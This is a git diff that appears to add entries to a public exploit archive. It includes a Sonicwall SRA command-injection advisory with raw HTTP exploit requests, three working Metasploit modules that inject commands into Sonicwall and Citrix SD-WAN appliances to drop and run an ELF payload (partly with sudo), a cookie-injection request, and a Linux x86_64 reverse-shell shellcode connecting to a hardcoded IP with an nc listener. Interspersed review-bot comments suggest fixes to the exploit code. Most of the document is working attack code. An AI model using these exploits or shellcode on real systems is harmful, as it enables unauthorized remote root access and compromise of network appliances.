@@ -0,0 +1,60 @@ +Sonicwall Secure Remote Access (SRA) - Command Injection Vulnerabilities + + Vendor: Sonicwall (Dell) + Product: Secure Remote Access (SRA) + Version: 8.1.0.2-14sv + Platform: Embedded Linux +Discovery: Russell Sanford of Critical Start (www.CriticalStart.com) + CVE: cve-2016-9682 + + +Tested against version 8.1.0.2-14sv on 11/28/16 (fully updated) + + +Description: +The Sonicwall Secure Remote Access server (ver 8.1.0.2-14sv) is vulnerable to two Remote Command Injection vulnerabilities in it's +web administrative interface. These vulnerabilies occur in the diagnostics CGI (/cgi-bin/diagnostics) component responsible for +emailing out information about the state of the system. The application doesn't properly escape the information passed in the 'tsrDeleteRestartedFile' +or 'currentTSREmailTo' variables before making a call to system() allowing for remote command injection. + +Exploitation of this vulnerability yeilds shell access to the remote machine under the useraccount 'nobody' + + +Impact: +Remote Code Execution + + +Exploit #1 ----------------------------------------------------------------- + +GET /cgi-bin/diagnostics?tsrEmailCurrent=true¤tTSREmailTo=|date>/tmp/xort||a%20%23 HTTP/1.1 +Host: 192.168.84.155 +Accept: */* +Accept-Language: en +User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) +Connection: close +Referer: https://192.168.84.155/cgi-bin/diagnostics +Cookie: SessURL=https%3A%2F%2F192.168.84.155%2Fcgi-bin%2Fwelcome; svDomainName=LocalDomain; activeUserSessionsTable=0; ajaxUpdates=ON; activeNxSessionsTable=0; servicesBookmarksTable=1; policyListTable=1; portalListTable=1; domainListTable=0; period=1; activeTab=4; curUrl=license; swap=dEVySFNhTXl5V3NLSXNWUFUzVzBNNTJJQ1o2WXpCODNrOGZYUGxYazJOZz0= + + +Exploit #2 ----------------------------------------------------------------- + +GET /cgi-bin/diagnostics?tsrDeleteRestarted=true&tsrDeleteRestartedFile=|date>/tmp/xort2||a%20%23 HTTP/1.1 +Host: 
192.168.84.155 +Accept: */* +Accept-Language: en +User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) +Connection: close +Referer: https://192.168.84.155/cgi-bin/diagnostics +Cookie: SessURL=https%3A%2F%2F192.168.84.155%2Fcgi-bin%2Fwelcome; svDomainName=LocalDomain; activeUserSessionsTable=0; ajaxUpdates=ON; activeNxSessionsTable=0; servicesBookmarksTable=1; policyListTable=1; portalListTable=1; domainListTable=0; period=1; activeTab=4; curUrl=sslcert; swap=dDdWMjhSYzlzMEZBd3kwQ29rTzZxQWFKdmxUSU5SRFVBQTRGRWk5UzJXVT0= + + +Timeline: +11/14/16 - Discovered in audit +11/20/16 - POC msf exploit written +11/28/16 - Contacted mitre for CVE +11/30/16 - CVE received from mitre (CVE-2016-9682) +11/30/16 - Dell notified through Sonicwall vuln reporting + + + + diff --git a/platforms/cgi/webapps/42343.rb b/platforms/cgi/webapps/42343.rb new file mode 100755 index 000000000..38bbaff2a --- /dev/null +++ b/platforms/cgi/webapps/42343.rb 
@@ -0,0 +1,196 @@ +# Exploit Title: Sonicwall gencsr CGI Remote Command Injection Vulnerablity +# Date: 12/24/2016 +# Exploit Author: xort @ Critical Start +# Vendor Homepage: www.sonicwall.com +# Software Link: sonicwall.com/products/sra-virtual-appliance +# Version: 8.1.0.6-21sv +# Tested on: 8.1.0.2-14sv +# +# CVE : (awaiting cve) + +# vuln: viewcert.cgi / CERT parameter + +# Description PostAuth Sonicwall SRA <= v8.1.0.2-14sv. This exploit leverages a command injection bug. +# +# xort @ Critical Start + + + + +require 'msf/core' + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + include Exploit::Remote::Tcp + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Sonicwall SRA <= v8.1.0.2-14sv gencsr.cgi remote exploit', + 'Description' => %q{ + This module exploits a remote command execution vulnerability in + the Sonicwall SRA Appliance Version <= v8.1.0.2-14sv. The vulnerability exist in + a section of the machine's adminstrative infertface for performing configurations + related to on-connect scripts to be launched for users's connecting. 
+ }, + 'Author' => + [ + 'xort@Critical Start', # vuln + metasploit module + ], + 'Version' => '$Revision: 1 $', + 'References' => + [ + [ 'none', 'none'], + ], + 'Platform' => [ 'linux'], + 'Privileged' => true, + 'Arch' => [ ARCH_X86 ], + 'SessionTypes' => [ 'shell' ], + 'Privileged' => false, + + 'Payload' => + { + 'Compat' => + { + 'ConnectionType' => 'find', + } + }, + + 'Targets' => + [ + ['Linux Universal', + { + 'Arch' => ARCH_X86, + 'Platform' => 'linux' + } + ], + ], + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('PASSWORD', [ false, 'Device password', "" ]), + OptString.new('USERNAME', [ true, 'Device password', "admin" ]), + OptString.new('CMD', [ false, 'Command to execute', "" ]), + Opt::RPORT(443), + ], self.class) + end + + def do_login(username, password_clear) + vprint_status( "Logging into machine with credentials...\n" ) + + # vars + timeout = 1550; + + # send request + res = send_request_cgi( + { + 'method' => 'POST', + 'uri' => "/cgi-bin/userLogin", + 'headers' => { + 'Connection' => 'close', + 'Content-Type' => 'application/x-www-form-urlencoded', + 'User-Agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0', + }, + 'vars_post' => { + 'username' => username, + 'password' => password_clear, + 'domain' => 'LocalDomain', + 'loginButton' => 'Login', + 'state' => 'login', + 'login' => 'true', + 'VerifyCert' => '0', + 'portalname' => 'VirtualOffice', + 'ajax' => 'true' + }, + + }, timeout) + + swap = res.headers['Set-Cookie'].split('\n').grep(/(.*)swap=([^;]+);/){$2}[0] + + return swap + end + + + def run_command(swap_cookie, cmd) + + # vars + timeout = 1550; + + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => "/cgi-bin/gencsr", + 'data' => "country=USA&san=ASDF&fqdn=www.google.com&county=dallas&applyButt=applyButt%3d&password=xxx&fullsan=xxx&organization=xxx&name=xxx&state=xxx&department=xxx&email=x@x.com&key_size=`#{cmd}`", + + 'headers' => + { + 'Cookie' => "swap=#{swap_cookie}", 
+ }, + }, timeout) + end + + def run_command_spliced(swap_cookie, cmd) + + write_mode = ">" + dump_file = "/tmp/qq" + reqs = 0 + + cmd_encoded = cmd.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2') + + for cmd_chunk in cmd_encoded.split(/(..................................................)/) + + cmd_new = "printf \"#{cmd_chunk}\"#{write_mode}#{dump_file}" + reqs += 1 + + vprint_status("Running Command (#{reqs})\n") + + # set to normal append for loops after the first round + if write_mode == ">" + write_mode = ">>" + end + + # add cmd to array to be exected later + run_command(swap_cookie, cmd_new) + end + + # execute payload stored at dump_file + run_command(swap_cookie, "chmod +x /tmp/qq; sh /tmp/qq") + + end + + def exploit + # timeout + timeout = 1550; + + # params + password_clear = datastore['PASSWORD'] + user = datastore['USERNAME'] + + # do authentication + swap_cookie = do_login(user, password_clear) + + vprint_status("authenticated 'swap' cookie: #{swap_cookie}\n") + + #if no 'CMD' string - add code for root shell + if not datastore['CMD'].nil? and not datastore['CMD'].empty? + + cmd = datastore['CMD'] + + # Encode cmd payload + encoded_cmd = cmd.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2') + + # kill stale calls to bdump from previous exploit calls for re-use + run_command(swap_cookie, ("sudo /bin/rm -f /tmp/n; printf \"#{encoded_cmd}\" > /tmp/n; chmod +rx /tmp/n; /tmp/n" )) + + else + # Encode payload to ELF file for deployment + elf = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw) + encoded_elf = elf.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2') + + run_command_spliced(swap_cookie, "printf \"#{encoded_elf}\">/tmp/m;chmod +rx /tmp/m;/tmp/m") + + # wait for magic + handler + end + end +end diff --git a/platforms/cgi/webapps/42344.rb b/platforms/cgi/webapps/42344.rb new file mode 100755 index 000000000..1d1b35deb --- /dev/null +++ b/platforms/cgi/webapps/42344.rb 
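Review bot: The header comment `# vuln: viewcert.cgi / CERT parameter` and the module Description (an interface for "on-connect scripts to be launched for users's connecting") do not describe this module — run_command posts to `/cgi-bin/gencsr` with the injection in the `key_size` form field — so the comment should read `# vuln: gencsr.cgi / key_size parameter` and the Description paragraph should be rewritten to say it is the CSR-generation page of the administrative interface; the same copy-pasted Description also appears in the 42344.rb hunk that follows. `'Privileged'` is given twice in the info hash (`true`, then `false`); Ruby keeps the last key, so the first entry is dead and should be removed to avoid misreading the module's privilege claim. The USERNAME option is described as 'Device password'; it should be `OptString.new('USERNAME', [ true, 'Device username', "admin" ]),`. `'References' => [ [ 'none', 'none'] ]` is a placeholder pair rather than a valid reference; since the file header says the CVE is still pending, leave the array empty until an identifier exists.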
@@ -0,0 +1,316 @@ +# Exploit Title: Sonicwall importlogo/sitecustomization CGI Remote Command Injection Vulnerablity +# Date: 12/25/2016 +# Exploit Author: xort @ Critical Start +# Vendor Homepage: www.sonicwall.com +# Software Link: sonicwall.com/products/sra-virtual-appliance +# Version: 8.1.0.2-14sv +# Tested on: 8.1.0.2-14sv +# +# CVE : (awaiting cve) + +# vuln1: importlogo.cgi / logo1 parameter (any contents can be uploaded) +# vuln2: sitecustomization.cgi / portalname (filename) parameter + +# Description PostAuth Sonicwall SRA <= v8.1.0.2-14sv. This exploit leverages a command injection bug. +# +# xort @ Critical Start + + + + +require 'msf/core' + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + include Exploit::Remote::Tcp + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Sonicwall SRA <= v8.1.0.2-14sv remote exploit', + 'Description' => %q{ + This module exploits a remote command execution vulnerability in + the Sonicwall SRA Appliance Version <= v8.1.0.2-14sv. The vulnerability exist in + a section of the machine's adminstrative infertface for performing configurations + related to on-connect scripts to be launched for users's connecting. 
+ }, + 'Author' => + [ + 'xort@Critical Start', # vuln + metasploit module + ], + 'Version' => '$Revision: 1 $', + 'References' => + [ + [ 'none', 'none'], + ], + 'Platform' => [ 'linux'], + 'Privileged' => true, + 'Arch' => [ ARCH_X86 ], + 'SessionTypes' => [ 'shell' ], + 'Privileged' => false, + + 'Payload' => + { + 'Compat' => + { + 'ConnectionType' => 'find', + } + }, + + 'Targets' => + [ + ['Linux Universal', + { + 'Arch' => ARCH_X86, + 'Platform' => 'linux' + } + ], + ], + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('PASSWORD', [ false, 'Device password', "" ]), + OptString.new('USERNAME', [ true, 'Device password', "admin" ]), + OptString.new('CMD', [ false, 'Command to execute', "" ]), + Opt::RPORT(443), + ], self.class) + end + + def do_login(username, password_clear) + vprint_status( "Logging into machine with credentials...\n" ) + + # vars + timeout = 1550; + + # send request + res = send_request_cgi( + { + 'method' => 'POST', + 'uri' => "/cgi-bin/userLogin", + 'headers' => { + 'Connection' => 'close', + 'Content-Type' => 'application/x-www-form-urlencoded', + 'User-Agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0', + }, + 'vars_post' => { + 'username' => username, + 'password' => password_clear, + 'domain' => 'LocalDomain', + 'loginButton' => 'Login', + 'state' => 'login', + 'login' => 'true', + 'VerifyCert' => '0', + 'portalname' => 'VirtualOffice', + 'ajax' => 'true' + }, + }, timeout) + + swap = res.headers['Set-Cookie'].split('\n').grep(/(.*)swap=([^;]+);/){$2}[0] + + return swap + end + + def upload_payload(swap_cookie, file_data) + vprint_status( "Upload Payload..." 
) + + # vars + timeout = 1550; + + upload_req = [ + [ "portalName","VirtualOffice" ], + [ "defaultLogo","0" ], + [ "uiVersion","2" ], + [ "bannerBackground", "light" ] + ] + + boundary = "---------------------------" + Rex::Text.rand_text_numeric(34) + post_data = "" + + # assemble upload_req parms + upload_req.each do |xreq| + post_data << "--#{boundary}\r\n" + post_data << "Content-Disposition: form-data; name=\"#{xreq[0]}\"\r\n\r\n" + post_data << "#{xreq[1]}\r\n" + end + + # add malicious file + post_data << "--#{boundary}\r\n" + post_data << "Content-Disposition: form-data; name=\"logo1\"; filename=\"x.jpg\"\r\n" + post_data << "Content-Type: image/jpeg\r\n\r\n" + post_data << "#{file_data}\r\n" + + post_data << "--#{boundary}--\r\n" + + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => "/cgi-bin/importlogo?uploadId=1", + 'ctype' => "multipart/form-data; boundary=#{boundary}", + 'data' => post_data, + 'headers' => + { + 'UserAgent' => "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0", + 'Cookie' => 'swap='+swap_cookie+';', + } + }, timeout) + + + end + + + def run_command(swap_cookie, cmd) + + vprint_status( "Running Command...\n" ) + + # vars + timeout = 1550; + + vprint_status("creating filename on target: #{cmd}\n") + + upload_req = [ + [ "portalname", cmd ], + [ "portaltitle","Virtual Office" ], + [ "bannertitle","Virtual Office" ], + [ "bannermessage","

Dell Sonicwall

" ], + [ "portalUrl","https://192.168.84.155/portal/xxx" ], + [ "loginflag","on" ], + [ "bannerflag","on" ], + [ "httpOnlyCookieFlag","on" ], + [ "cachecontrol","on" ], + [ "uniqueness", "on" ], + [ "duplicateLoginAction", "1" ], + [ "livetilesmalllogo", "" ], + [ "livetilemediumlogo", "" ], + [ "livetilewidelogo", "" ], + [ "livetilelargelogo", "" ], + [ "livetilebackground", "#0085C3" ], + [ "livetilename", "" ], + [ "home2page", "on" ], + [ "allowNetExtender", "on" ], + [ "virtualpassagepage", "on" ], + [ "cifsdirectpage", "on" ], + [ "cifspage", "on" ], + [ "cifsappletpage", "on" ], + [ "cifsapplet", "on" ], + [ "cifsdefaultfilesharepath", "" ], + [ "home3page", "on" ], + [ "showAllBookmarksTab", "on" ], + [ "showDefaultTabs", "on" ], + [ "showCopyright", "on" ], + [ "showSidebar", "on" ], + [ "showUserPortalHelpButton", "on" ], + [ "userPortalHelpURL", "" ], + [ "showUserPortalOptionsButton", "on" ], + [ "homemessage", "

Welcome to the Dell SonicWALL Virtual Office

" ], + [ "hptabletitle", "Virtual Office Bookmarks" ], + [ "vhostName", "www.#{Rex::Text.rand_text_hex(32)}.com" ], + [ "vhostAlias", "" ], + [ "vhostInterface", "ALL" ], + [ "vhostEnableKeepAlive", "on" ], + [ "cdssodn", ".yahoo.com" ], + [ "enableSSLForwardSecrecy", "0" ], + [ "enableSSLProxyVerify", "0" ], + [ "sslProxyProtocol", "0" ], + [ "loginSchedule", "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" ], + [ "formsection", "main" ], + [ "doAdd", "1" ], + [ "cgiaction", "1" ], + [ "themename", "stylesonicwall" ], + [ "onlinehelp", "" ], + [ "tmp_currentVhostName", "" ], + [ "tmp_currentVhostAlias", "" ], + [ "tmp_currentVhostInterface", "ALL" ], + [ "tmp_currentVhostIp", "" ], + [ "tmp_currentVhostIPv6", "" ], + [ "tmp_currentVhostEnableHTTP", "0" ], + [ "tmp_currentVhostEnableKeepAlive", "1" ], + [ "tmp_currentVhostCert", "" ], + [ "tmp_currEnforceSSLProxyProtocol", "0" ], + [ "tmp_currSSLProxyProtocol", "0" ], + [ "tmp_currEnableSSLProxyVerify", "0" ], + [ "tmp_currEnableSSLForwardSecrecy", "0" ], + [ "tmp_currentVhostOffloadRewrite", "" ], + [ "restartWS", "1" ], + [ "reuseFavicon", "" ], + [ "oldReuseFavicon", "" ], + ] + + boundary = "---------------------------" + Rex::Text.rand_text_numeric(34) + post_data = "" + + # assemble upload_req parms + upload_req.each do |xreq| + post_data << "--#{boundary}\r\n" + post_data << "Content-Disposition: form-data; name=\"#{xreq[0]}\"\r\n\r\n" + post_data << "#{xreq[1]}\r\n" + end + + post_data << "--#{boundary}--\r\n" + + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => "/cgi-bin/sitecustomization", + 'ctype' => "multipart/form-data; boundary=#{boundary}", + 'data' => post_data, + 'headers' => + { + 'UserAgent' => "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0", + 'Cookie' => 'swap='+swap_cookie+';', + } + }, timeout) + end + + def 
run_command_file(swap_cookie) + + # use prefix so exploit can be re-used (unique portalname requirment) + prefix = Rex::Text.rand_text_numeric(5) + + run_command(swap_cookie, "#{prefix}$({find,$({perl,-e,'print(chr(0x2f))'}),-name,VirtualOffice.gif,-exec,cp,{},qz,$({perl,-e,'print(chr(0x3b))'})})") + run_command(swap_cookie, "#{prefix}$({chmod,777,qz})") + run_command(swap_cookie, "#{prefix}$({sh,-c,.$({perl,-e,'print(chr(0x2f))'})qz})") + + end + + def exploit + # timeout + timeout = 1550; + + # params + password_clear = datastore['PASSWORD'] + user = datastore['USERNAME'] + + # do authentication + swap_cookie = do_login(user, password_clear) + + vprint_status("authenticated 'swap' cookie: #{swap_cookie}\n") + + # pause to let things run smoothly + #sleep(5) + + #if no 'CMD' string - add code for root shell + if not datastore['CMD'].nil? and not datastore['CMD'].empty? + + cmd = datastore['CMD'] + + # Encode cmd payload + encoded_cmd = cmd.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2') + + # kill stale calls to bdump from previous exploit calls for re-use + upload_payload(swap_cookie, ("sudo /bin/rm -f /tmp/n; printf \"#{encoded_cmd}\" > /tmp/n; chmod +rx /tmp/n; /tmp/n" )) + else + # Encode payload to ELF file for deployment + elf = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw) + encoded_elf = elf.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2') + + # upload elf to /tmp/m , chmod +rx /tmp/m , then run /tmp/m (payload) + upload_payload(swap_cookie, ("#!/bin/bash\necho -e \"#{encoded_elf}\" > /tmp/m; chmod +rx /tmp/m; /tmp/m")) + run_command_file(swap_cookie) + + # wait for magic + handler + + end + + + end +end diff --git a/platforms/cgi/webapps/42345.rb b/platforms/cgi/webapps/42345.rb new file mode 100755 index 000000000..4c20a2a24 --- /dev/null +++ b/platforms/cgi/webapps/42345.rb 
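Review bot: The info hash in `initialize` lists `'Privileged'` twice (`true`, then `false`); Ruby keeps the last duplicate key, so the module is registered as unprivileged while the earlier entry reads as the intent — keep a single entry that matches the privilege level the description claims. The USERNAME option is described as a password; it should read `OptString.new('USERNAME', [ true, 'Device username', "admin" ]),`. `'References' => [ [ 'none', 'none' ] ]` is not a recognised Metasploit reference type and, with the CVE still pending, an empty array or a `'URL'` entry is the documented form; the `timeout` local in `exploit` is assigned and never used, and `include Exploit::Remote::Tcp` is unused next to `HttpClient`. The same duplicated `'Privileged'` key and USERNAME description appear in the preceding module of this commit, whose hunk starts before this view.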
@@ -0,0 +1,140 @@ +# Exploit Title: Citix SD-WAN logout cookie preauth Remote Command Injection Vulnerablity +# Date: 02/20/2017 +# Exploit Author: xort @ Critical Start +# Vendor Homepage: www.citrix.com +# Software Link: https://www.citrix.com/downloads/cloudbridge/ +# Version: 9.1.2.26.561201 +# Tested on: 9.1.2.26.561201 (OS partition 4.6) +# +# CVE : (awaiting cve) + +# vuln: CGISESSID Cookie parameter +# associated vuln urls: +# /global_data/ +# /global_data/headerdata +# /log +# / +# /r9-1-2-26-561201/configuration/ +# /r9-1-2-26-561201/configuration/edit +# /r9-1-2-26-561201/configuration/www.citrix.com [CGISESSID cookie] +# +# Description PreAuth Remote Root Citrix SD-WAN <= v9.1.2.26.561201. This exploit leverages a command injection bug. +# +# xort @ Critical Start + +require 'msf/core' + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + include Exploit::Remote::Tcp + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Citrix SD-WAN CGISESSID Cookie Remote Root', + 'Description' => %q{ + This module exploits a remote command execution vulnerability in the Citrix SD-WAN Appliace Version <= v9.1.2.26.561201. The vulnerability exist in a section of the machine's session checking functionality. If the CGISESSID cookie holds shell-command data - it is used in a call to system where input is processed unsanitized. 
+ }, + 'Author' => + [ + 'xort@Critical Start', # vuln + metasploit module + ], + 'Version' => '$Revision: 1 $', + 'References' => + [ + [ 'none', 'none'], + ], + 'Platform' => [ 'linux'], + 'Privileged' => true, + 'Arch' => [ ARCH_X86 ], + 'SessionTypes' => [ 'shell' ], + 'Payload' => + { + 'Compat' => + { + 'ConnectionType' => 'find', + } + }, + + 'Targets' => + [ + ['Linux Universal', + { + 'Arch' => ARCH_X86, + 'Platform' => 'linux' + } + ], + ], + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('CMD', [ false, 'Command to execute', "" ]), + Opt::RPORT(443), + ], self.class) + end + + def run_command(cmd) + + vprint_status( "Running Command...\n" ) + + # send request with payload + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => "/global_data/", + 'vars_post' => { + 'action' => 'logout' + }, + 'headers' => { + 'Connection' => 'close', + 'Cookie' => 'CGISESSID=e6f1106605b5e8bee6114a3b5a88c5b4`'+cmd+'`; APNConfigEditorSession=0qnfarge1v62simtqeb300lkc7;', + } + + }) + + + # pause to let things run smoothly + sleep(2) + + + end + + + def exploit + # timeout + timeout = 1550; + + # pause to let things run smoothly + sleep(2) + + #if no 'CMD' string - add code for root shell + if not datastore['CMD'].nil? and not datastore['CMD'].empty? 
+ + cmd = datastore['CMD'] + + # Encode cmd payload + + encoded_cmd = cmd.unpack("H*").join().gsub(/(\w)(\w)/,'\\\\\\\\\\\\x\1\2') + + # upload elf to /tmp/n , chmod +rx /tmp/n , then run /tmp/n (payload) + run_command("echo -e #{encoded_cmd}>/tmp/n") + run_command("chmod 755 /tmp/n") + run_command("sudo /tmp/n") + else + # Encode payload to ELF file for deployment + elf = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw) + encoded_elf = elf.unpack("H*").join().gsub(/(\w)(\w)/,'\\\\\\\\\\\\x\1\2') + + # upload elf to /tmp/m , chmod +rx /tmp/m , then run /tmp/m (payload) + run_command("echo -e #{encoded_elf}>/tmp/m") + run_command("chmod 755 /tmp/m") + run_command("sudo /tmp/m") + + # wait for magic + handler + + end + + + end +end diff --git a/platforms/cgi/webapps/42346.txt b/platforms/cgi/webapps/42346.txt new file mode 100755 index 000000000..e6a983872 --- /dev/null +++ b/platforms/cgi/webapps/42346.txt @@ -0,0 +1,12 @@ +POST /cgi-bin/login.cgi?redirect=/ HTTP/1.1 +Host: 10.242.129.149 +Accept: */* +Accept-Language: en +User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) +Connection: close +Referer: https://10.242.129.149/cgi-bin/login.cgi?redirect=/ +Cookie: CAKEPHP=`sleep 10` +Content-Type: application/x-www-form-urlencoded +Content-Length: 13 + +action=logout \ No newline at end of file diff --git a/platforms/hardware/remote/27320.txt b/platforms/hardware/webapps/27320.txt similarity index 100% rename from platforms/hardware/remote/27320.txt rename to platforms/hardware/webapps/27320.txt diff --git a/platforms/hardware/remote/33740.txt b/platforms/hardware/webapps/33740.txt similarity index 100% rename from platforms/hardware/remote/33740.txt rename to platforms/hardware/webapps/33740.txt diff --git a/platforms/hardware/remote/36286.txt b/platforms/hardware/webapps/36286.txt similarity index 100% rename from platforms/hardware/remote/36286.txt rename to platforms/hardware/webapps/36286.txt 
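Review bot: The comment above the CMD branch in `exploit`, `# upload elf to /tmp/n , chmod +rx /tmp/n , then run /tmp/n (payload)`, is copied from the ELF branch and does not describe what follows — that branch writes the user-supplied CMD string, not an ELF; a comment such as `# write the CMD string to /tmp/n and run it` is what the reader needs. The fixed `APNConfigEditorSession` value in the `Cookie` header of `run_command` is undocumented; a one-line comment saying whether the server requires that cookie or the value is an arbitrary placeholder would save the next maintainer a guess. `timeout = 1550;` in `exploit` is assigned and never used, and `include Exploit::Remote::Tcp` is unused alongside `HttpClient`. `'References' => [ [ 'none', 'none' ] ]` is not a recognised Metasploit reference type, and the header comment misspells the vendor as `Citix`.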
diff --git a/platforms/hardware/remote/36865.txt b/platforms/hardware/webapps/36865.txt similarity index 100% rename from platforms/hardware/remote/36865.txt rename to platforms/hardware/webapps/36865.txt diff --git a/platforms/hardware/remote/37982.pl b/platforms/hardware/webapps/37982.pl similarity index 100% rename from platforms/hardware/remote/37982.pl rename to platforms/hardware/webapps/37982.pl diff --git a/platforms/hardware/remote/38604.txt b/platforms/hardware/webapps/38604.txt similarity index 100% rename from platforms/hardware/remote/38604.txt rename to platforms/hardware/webapps/38604.txt diff --git a/platforms/hardware/remote/38853.sh b/platforms/hardware/webapps/38853.sh similarity index 100% rename from platforms/hardware/remote/38853.sh rename to platforms/hardware/webapps/38853.sh diff --git a/platforms/lin_x86-64/shellcode/42339.c b/platforms/lin_x86-64/shellcode/42339.c new file mode 100755 index 000000000..a54674071 --- /dev/null +++ b/platforms/lin_x86-64/shellcode/42339.c 
@@ -0,0 +1,155 @@ +/* +;Category: Shellcode +;Title: GNU/Linux x86_64 - Reverse Shell Shellcode +;Author: m4n3dw0lf +;Github: https://github.com/m4n3dw0lf +;Date: 18/07/2017 +;Architecture: Linux x86_64 +;Tested on: #1 SMP Debian 4.9.18-1 (2017-03-30) x86_64 GNU/Linux + +########## +# Source # +########## + +section .text + global _start + _start: + push rbp + mov rbp,rsp + xor rdx, rdx + push 1 + pop rsi + push 2 + pop rdi + push 41 + pop rax ; sys_socket + syscall + sub rsp, 8 + mov dword [rsp], 0x5c110002 ; Port 4444, 4Bytes: 0xPORT + Fill with '0's + 2 + mov dword [rsp+4], 0x801a8c0 ; IP Address 192.168.1.8, 4Bytes: 0xIPAddress (Little Endiannes) + lea rsi, [rsp] + add rsp, 8 + pop rbx + xor rbx, rbx + push 16 + pop rdx + push 3 + pop rdi + push 42 + pop rax; sys_connect + syscall + xor rsi, rsi + shell_loop: + mov al, 33 + syscall + inc rsi + cmp rsi, 2 + jle shell_loop + xor rax, rax + xor rsi, rsi + mov rdi, 0x68732f6e69622f2f + push rsi + push rdi + mov rdi, rsp + xor rdx, rdx + mov al, 59 + syscall + +################################# +# Compile and execute with NASM # +################################# + +nasm -f elf64 reverse_tcp_shell.s -o reverse_tcp_shell.o +ld reverse_tcp_shell.o -o reverse_tcp_shell + +######################### +# objdump --disassemble # +######################### + +reverse_tcp_shell: file format elf64-x86-64 + + +Disassembly of section .text: + +0000000000400080 <_start>: + 400080: 55 push %rbp + 400081: 48 89 e5 mov %rsp,%rbp + 400084: 48 31 d2 xor %rdx,%rdx + 400087: 6a 01 pushq $0x1 + 400089: 5e pop %rsi + 40008a: 6a 02 pushq $0x2 + 40008c: 5f pop %rdi + 40008d: 6a 29 pushq $0x29 + 40008f: 58 pop %rax + 400090: 0f 05 syscall + 400092: 48 83 ec 08 sub $0x8,%rsp + 400096: c7 04 24 02 00 11 5c movl $0x5c110002,(%rsp) + 40009d: c7 44 24 04 c0 a8 01 movl $0x801a8c0,0x4(%rsp) + 4000a4: 08 + 4000a5: 48 8d 34 24 lea (%rsp),%rsi + 4000a9: 48 83 c4 08 add $0x8,%rsp + 4000ad: 5b pop %rbx + 4000ae: 48 31 db xor %rbx,%rbx + 4000b1: 6a 10 
pushq $0x10 + 4000b3: 5a pop %rdx + 4000b4: 6a 03 pushq $0x3 + 4000b6: 5f pop %rdi + 4000b7: 6a 2a pushq $0x2a + 4000b9: 58 pop %rax + 4000ba: 0f 05 syscall + 4000bc: 48 31 f6 xor %rsi,%rsi + +00000000004000bf : + 4000bf: b0 21 mov $0x21,%al + 4000c1: 0f 05 syscall + 4000c3: 48 ff c6 inc %rsi + 4000c6: 48 83 fe 02 cmp $0x2,%rsi + 4000ca: 7e f3 jle 4000bf + 4000cc: 48 31 c0 xor %rax,%rax + 4000cf: 48 31 f6 xor %rsi,%rsi + 4000d2: 48 bf 2f 2f 62 69 6e movabs $0x68732f6e69622f2f,%rdi + 4000d9: 2f 73 68 + 4000dc: 56 push %rsi + 4000dd: 57 push %rdi + 4000de: 48 89 e7 mov %rsp,%rdi + 4000e1: 48 31 d2 xor %rdx,%rdx + 4000e4: b0 3b mov $0x3b,%al + 4000e6: 0f 05 syscall + + +####################### +# 104 Bytes Shellcode # +####################### + +for i in `objdump -d reverse_tcp_shell | tr '\t' ' ' | tr ' ' '\n' | egrep '^[0-9a-f]{2}$' ` ; do echo -n "\x$i" ; done + +\x55\x48\x89\xe5\x48\x31\xd2\x6a\x01\x5e\x6a\x02\x5f\x6a\x29\x58\x0f\x05\x48\x83\xec\x08\xc7\x04\x24\x02\x00\x11\x5c\xc7\x44\x24\x04\xc0\xa8\x01\x08\x48\x8d\x34\x24\x48\x83\xc4\x08\x5b\x48\x31\xdb\x6a\x10\x5a\x6a\x03\x5f\x6a\x2a\x58\x0f\x05\x48\x31\xf6\xb0\x21\x0f\x05\x48\xff\xc6\x48\x83\xfe\x02\x7e\xf3\x48\x31\xc0\x48\x31\xf6\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x56\x57\x48\x89\xe7\x48\x31\xd2\xb0\x3b\x0f\x05 + +######## +# Test # +######## + +In the asm source: + mov dword [rsp+4], 0x801a8c0 + +In the host that will receive the shell run: + nc -vvlp 4444 + +On the target machine: + compile with: + gcc -fno-stack-protector -z execstack reverse_tcp_shell.c -o reverse_tcp_shell + run: + ./reverse_tcp_shell + + + gcc -fno-stack-protector -z execstack reverse_tcp_shell.c -o reverse_tcp_shell +*/ + +#include + +unsigned char shellcode[] = 
